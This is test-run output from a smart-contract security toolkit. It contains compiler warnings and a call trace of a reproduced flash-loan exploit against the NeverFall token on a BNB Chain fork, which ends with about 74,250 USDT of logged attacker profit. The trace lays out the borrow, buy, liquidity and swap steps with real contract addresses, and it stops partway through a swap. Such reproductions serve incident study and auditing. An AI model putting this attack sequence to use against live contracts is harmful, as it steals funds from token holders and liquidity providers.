Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.18s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/NeverFall_exp.sol:39:26:
   |
39 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                          ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/NeverFall_exp.sol:39:42:
   |
39 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                          ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/NeverFall_exp.sol:39:59:
   |
39 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                           ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/NeverFall_exp.sol:39:76:
   |
39 |     function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                            ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 688.11ms (3.76ms CPU time)

Ran 1 test for src/test/2023-05/NeverFall_exp.sol:ContractTest
[PASS] testExploit() (gas: 536280)
Logs:
  [After Attacks]  Attacker usdt balance: 74250.894511677726514604

Traces:
  [3649] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 27863177 [2.786e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [595680] ContractTest::testExploit()
    ├─ [589377] 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00::swap(1600000000000000000000000 [1.6e24], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [12871] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1600000000000000000000000 [1.6e24])
    │   │   ├─ emit Transfer(from: 0x7EFaEf62fDdCCa950418312c6C91Aef321375A00, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1600000000000000000000000 [1.6e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x86163c67671b041a0570f826e28048defbd2664533c4d000d0b8bc65e886d6c5: 0x0000000000000000000000000000000000000000003e00296ec0b5e75fc3bd84 → 0x0000000000000000000000000000000000000000003cad594242a137f7c3bd84
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x0000000000000000000000000000000000000000000152d02ca19ba1d7c10000
    │   │   └─ ← [Return] true
    │   ├─ [543073] ContractTest::pancakeCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1600000000000000000000000 [1.6e24], 0, 0x00)
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1600000010000000000000000 [1.6e24]
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb29064e4ba2f5b83cc12aeda110cbee20d821de5528ad7a1771efab6782233d7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [282269] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::buy(200000000000000000000000 [2e23])
    │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 200000000000000000000000 [2e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 200000000000000000000000 [2e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 115792089237316195423570985008687907853269984665640563839457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb29064e4ba2f5b83cc12aeda110cbee20d821de5528ad7a1771efab6782233d7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffd5a5fa703d6a12ffffff
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000152d02ca19ba1d7c10000 → 0x0000000000000000000000000000000000000000000128762711d90beac10000
    │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 10920 → 0x000000000000000000000000000000000000000000002a5a058fc295ed002aa8
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [7462] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 200000000000000000000000 [2e23])
    │   │   │   │   ├─ emit Approval(owner: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 200000000000000000000000 [2e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x933e5e13683ad3ea1dcf3a08964825e90d12655ccf6957f79e2ff45e18347389: 0x000000000000000000000000000000000000000000000001158e460913d00000 → 0x000000000000000000000000000000000000000000002a5a058fc295ed000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [133358] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x55d398326f99059fF775485246999027B3197955, 99900000000000000000000000000 [9.99e28], 184000000000000000000000 [1.84e23], 1, 184000000000000000000000 [1.84e23], 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 1683045919 [1.683e9])
    │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x55d398326f99059fF775485246999027B3197955) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c
    │   │   │   │   ├─ [2893] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 390749131999675869539950 [3.907e23], 177366502266430132318230923 [1.773e26], 1683045649 [1.683e9]
    │   │   │   │   ├─ [22682] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::transferFrom(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, 83520176359726925202079336 [8.352e25])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, value: 83520176359726925202079336 [8.352e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x733e043babeda38acb227cbd1f318e7f86f2f49a264ee6218338712c2add1219: 0x0000000000000000000000000000000000000001419f53e97f26ecbb582ed4f8 → 0x0000000000000000000000000000000000000001415a3dd3a9f5e485529e9690
    │   │   │   │   │   │   @ 0xcad15fe616505733dc9fd5d5a4d58939440cf900b48ccec5945e26778d07fc19: 0x00000000000000000000000000000000000000000092b6d15aaaf2460a21d98b → 0x000000000000000000000000000000000000000000d7cce72fdbfa7c0fb217f3
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, 184000000000000000000000 [1.84e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, value: 184000000000000000000000 [1.84e23])
    │   │   │   │   │   ├─ emit Approval(owner: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 16000000000000000000000 [1.6e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x933e5e13683ad3ea1dcf3a08964825e90d12655ccf6957f79e2ff45e18347389: 0x000000000000000000000000000000000000000000002a5a058fc295ed000000 → 0x0000000000000000000000000000000000000000000003635c9adc5dea000000
    │   │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x000000000000000000000000000000000000000000002a5a058fc295ed002aa8 → 0x0000000000000000000000000000000000000000000003635c9adc5dea002aa8
    │   │   │   │   │   │   @ 0xe54364338bb7761f00278a29c33f56b298f18ab4c3332b045223b2a7282ecb22: 0x0000000000000000000000000000000000000000000052be8d8a3c1365ffae6e → 0x0000000000000000000000000000000000000000000079b5367f224b68ffae6e
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [82236] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::mint(0x5ABDe8B434133C98c36F4B21476791D95D888bF5)
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 574749131999675869539950 [5.747e23]
    │   │   │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 260886678626157057520310259 [2.608e26]
    │   │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 170370208048680676 [1.703e17])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 3918514659767012722445607 [3.918e24])
    │   │   │   │   │   ├─ emit Sync(reserve0: 574749131999675869539950 [5.747e23], reserve1: 260886678626157057520310259 [2.608e26])
    │   │   │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 184000000000000000000000 [1.84e23], amount1: 83520176359726925202079336 [8.352e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000006e225781dbda1e8e00165 → 0x0000000000000000000000000000000000000000000a1fec95735a14a34c9d70
    │   │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x00000000000000000000000000000000000000000006e1dbbb053869dca08aac → 0x0000000000000000000000000000000000000000000a1fa2d5fd8e0f640017d3
    │   │   │   │   │   │   @ 11: 0x00000000000000000000002f6bc37688abf323336d8b44f10c1885d3af45b172 → 0x000000000000000000000066989b1578237e20f60188386360a23a4b5dda746a
    │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x000000000000000000000000000000000000000000000049bd1885380c3f72d1 → 0x000000000000000000000000000000000000000000000049bf75cc053f4c81b5
    │   │   │   │   │   │   @ 10: 0x000000000000000000000000000000001cf4821516ddb35912eed0076f58e34f → 0x000000000000000000000000000000001cf51a5ba0b09f0572ae8aa41be5ba21
    │   │   │   │   │   │   @ 8: 0x64513d1100000092b6d15aaaf2460a21d98b0000000052be8d8a3c1365ffae6e → 0x64513e1f000000d7cce72fdbfa7c0fb217f30000000079b5367f224b68ffae6e
    │   │   │   │   │   │   @ 9: 0x000000000000000000000000000086279324412878ce9cf3c45c80b7853db772 → 0x0000000000000000000000000000862971e108f9254fa02b9eb55eb0d2a647ce
    │   │   │   │   │   └─ ← [Return] 3918514659767012722445607 [3.918e24]
    │   │   │   │   └─ ← [Return] 83520176359726925202079336 [8.352e25], 184000000000000000000000 [1.84e23], 3918514659767012722445607 [3.918e24]
    │   │   │   ├─ [63655] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(8000000000000000000000 [8e21], 0, [0x55d398326f99059fF775485246999027B3197955, 0x5ABDe8B434133C98c36F4B21476791D95D888bF5], 0xE5aaa64f7CE48027457E661258113650D584DFee, 1683045919 [1.683e9])
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0x5ABDe8B434133C98c36F4B21476791D95D888bF5, 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, 8000000000000000000000 [8e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, value: 8000000000000000000000 [8e21])
    │   │   │   │   │   ├─ emit Approval(owner: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 8000000000000000000000 [8e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xe54364338bb7761f00278a29c33f56b298f18ab4c3332b045223b2a7282ecb22: 0x0000000000000000000000000000000000000000000079b5367f224b68ffae6e → 0x000000000000000000000000000000000000000000007b66e4cc907a5dffae6e
    │   │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x0000000000000000000000000000000000000000000003635c9adc5dea002aa8 → 0x0000000000000000000000000000000000000000000001b1ae4d6e2ef5002aa8
    │   │   │   │   │   │   @ 0x933e5e13683ad3ea1dcf3a08964825e90d12655ccf6957f79e2ff45e18347389: 0x0000000000000000000000000000000000000000000003635c9adc5dea000000 → 0x0000000000000000000000000000000000000000000001b1ae4d6e2ef5000000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0xE5aaa64f7CE48027457E661258113650D584DFee) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [893] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 574749131999675869539950 [5.747e23], 260886678626157057520310259 [2.608e26], 1683045919 [1.683e9]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 582749131999675869539950 [5.827e23]
    │   │   │   │   ├─ [45839] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::swap(0, 3572630200059899042909716 [3.572e24], 0xE5aaa64f7CE48027457E661258113650D584DFee, 0x)
    │   │   │   │   │   ├─ [30672] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::transfer(0xE5aaa64f7CE48027457E661258113650D584DFee, 3572630200059899042909716 [3.572e24])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, to: 0xE5aaa64f7CE48027457E661258113650D584DFee, value: 3572630200059899042909716 [3.572e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xd2424ec41814cfd9e83b8f6ab08d932bb2a586577846589a726343c918635312: 0 → 0x00000000000000000000000000000000000000000002f488abd50c6f50d8ce14
    │   │   │   │   │   │   │   @ 0xcad15fe616505733dc9fd5d5a4d58939440cf900b48ccec5945e26778d07fc19: 0x000000000000000000000000000000000000000000d7cce72fdbfa7c0fb217f3 → 0x000000000000000000000000000000000000000000d4d85e8406ee0cbed949df
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 582749131999675869539950 [5.827e23]
    │   │   │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 257314048426097158477400543 [2.573e26]
    │   │   │   │   │   ├─ emit Sync(reserve0: 582749131999675869539950 [5.827e23], reserve1: 257314048426097158477400543 [2.573e26])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 8000000000000000000000 [8e21], amount1In: 0, amount0Out: 0, amount1Out: 3572630200059899042909716 [3.572e24], to: 0xE5aaa64f7CE48027457E661258113650D584DFee)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x64513e1f000000d7cce72fdbfa7c0fb217f30000000079b5367f224b68ffae6e → 0x64513e1f000000d4d85e8406ee0cbed949df000000007b66e4cc907a5dffae6e
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0xE5aaa64f7CE48027457E661258113650D584DFee) [staticcall]
    │   │   │   │   │   └─ ← [Return] 3572630200059899042909716 [3.572e24]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 79947546159667026159169620 [7.994e25])
    │   │   │   ├─ emit Transfer(from: 0xE5aaa64f7CE48027457E661258113650D584DFee, to: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, value: 3572630200059899042909716 [3.572e24])
    │   │   │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(0x712f6993F8E1A3DE6ACF2f4adF8Ab102748edc88, 8000000000000000000000 [8e21])
    │   │   │   │   ├─ emit Transfer(from: 0x5ABDe8B434133C98c36F4B21476791D95D888bF5, to: 0x712f6993F8E1A3DE6ACF2f4adF8Ab102748edc88, value: 8000000000000000000000 [8e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x7fd8802c3f8d44c7d8dc7c43d09d5f1eefeb5657332dfd118e971199f046dae8: 0x00000000000000000000000000000000000000000000000cdbcf4c79059391b0 → 0x0000000000000000000000000000000000000000000001be8a1cbaa7fa9391b0
    │   │   │   │   │   @ 0x8f01d310d6d6a99fe07fac2e72f1fdc53de2c55289e7747117be10c944183558: 0x0000000000000000000000000000000000000000000001b1ae4d6e2ef5002aa8 → 10920
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit BuyNF(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 200000000000000000000000 [2e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0x7fd8802c3f8d44c7d8dc7c43d09d5f1eefeb5657332dfd118e971199f046dae8: 0x00000000000000000000000000000000000000000000000cdbcf4c79059391b0 → 0x0000000000000000000000000000000000000000000001be8a1cbaa7fa9391b0
    │   │   │   │   @ 0x733e043babeda38acb227cbd1f318e7f86f2f49a264ee6218338712c2add1219: 0x0000000000000000000000000000000000000001415a3dd3a9f5e485529e9690 → 0x0000000000000000000000000000000000000001411b10cf2c6ef52deebff450
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000042218d295bfbc6b4b77054
    │   │   │   │   @ 0xd2424ec41814cfd9e83b8f6ab08d932bb2a586577846589a726343c918635312: 0x00000000000000000000000000000000000000000002f488abd50c6f50d8ce14 → 0
    │   │   │   └─ ← [Return] 83520176359726925202079336 [8.352e25]
    │   │   ├─ [2562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   └─ ← [Return] true
    │   │   ├─ [61655] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(1400000000000000000000000 [1.4e24], 0, [0x55d398326f99059fF775485246999027B3197955, 0x5ABDe8B434133C98c36F4B21476791D95D888bF5], 0x051d6a5f987e4fc53B458eC4f88A104356E6995a, 1683045919 [1.683e9])
    │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, 1400000000000000000000000 [1.4e24])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, value: 1400000000000000000000000 [1.4e24])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640562639457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe54364338bb7761f00278a29c33f56b298f18ab4c3332b045223b2a7282ecb22: 0x000000000000000000000000000000000000000000007b66e4cc907a5dffae6e → 0x00000000000000000000000000000000000000000001a3dd0bbae293d8ffae6e
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffed789d911ade684ffffff
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000128762711d90beac10000 → 0x000000000000000000000000000000000000000000000000002386f26fc10000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x051d6a5f987e4fc53B458eC4f88A104356E6995a) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 582749131999675869539950 [5.827e23], 257314048426097158477400543 [2.573e26], 1683045919 [1.683e9]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   └─ ← [Return] 1982749131999675869539950 [1.982e24]
    │   │   │   ├─ [43839] 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c::swap(0, 181553227846560717220996778 [1.815e26], 0x051d6a5f987e4fc53B458eC4f88A104356E6995a, 0x)
    │   │   │   │   ├─ [28672] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::transfer(0x051d6a5f987e4fc53B458eC4f88A104356E6995a, 181553227846560717220996778 [1.815e26])
    │   │   │   │   │   ├─ emit Transfer(from: 0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c, to: 0x051d6a5f987e4fc53B458eC4f88A104356E6995a, value: 181553227846560717220996778 [1.815e26])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcad15fe616505733dc9fd5d5a4d58939440cf900b48ccec5945e26778d07fc19: 0x000000000000000000000000000000000000000000d4d85e8406ee0cbed949df → 0x0000000000000000000000000000000000000000003eaafa502611d1e5cb6335
    │   │   │   │   │   │   @ 0x0fc233debfd3c3be77f067554c9bdcb6c5bc0fc2e4c27f479a29cc1ed806350b: 0 → 0x000000000000000000000000000000000000000000962d6433e0dc3ad90de6aa
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1982749131999675869539950 [1.982e24]
    │   │   │   │   ├─ [608] 0x5ABDe8B434133C98c36F4B21476791D95D888bF5::balanceOf(0x97a08A9Fb303b4f6F26C5B3C3002EBd0E6417d2c) [staticcall]
    │   │   │   │   │   └─ ← [Return] 75760820579536441256403765 [7.576e25]
    │   │   │   │   ├─ emit Sync(reserve0: 1982749131999675869539950 [1.982e24], reserve1: 75760820579536441256403765 [7.576e25])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 1400000000000000000000000 [1.4e24], amount1In: 0, amount0Out: 0, amount1Out: 181553227846560717220996778 [1.815e26], to: 0x051d6a5f987e4fc53B458eC4f88A104356E6995a)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x64513e1f000000d4d85e8406ee0cbed949df000000007b66e4cc907a5dffae6e → 0x64513e1f0000003eaafa502611d1e5cb633500000001a3dd0bbae293d8ffae6e
    │   │   │   │   └─ ← [Stop]
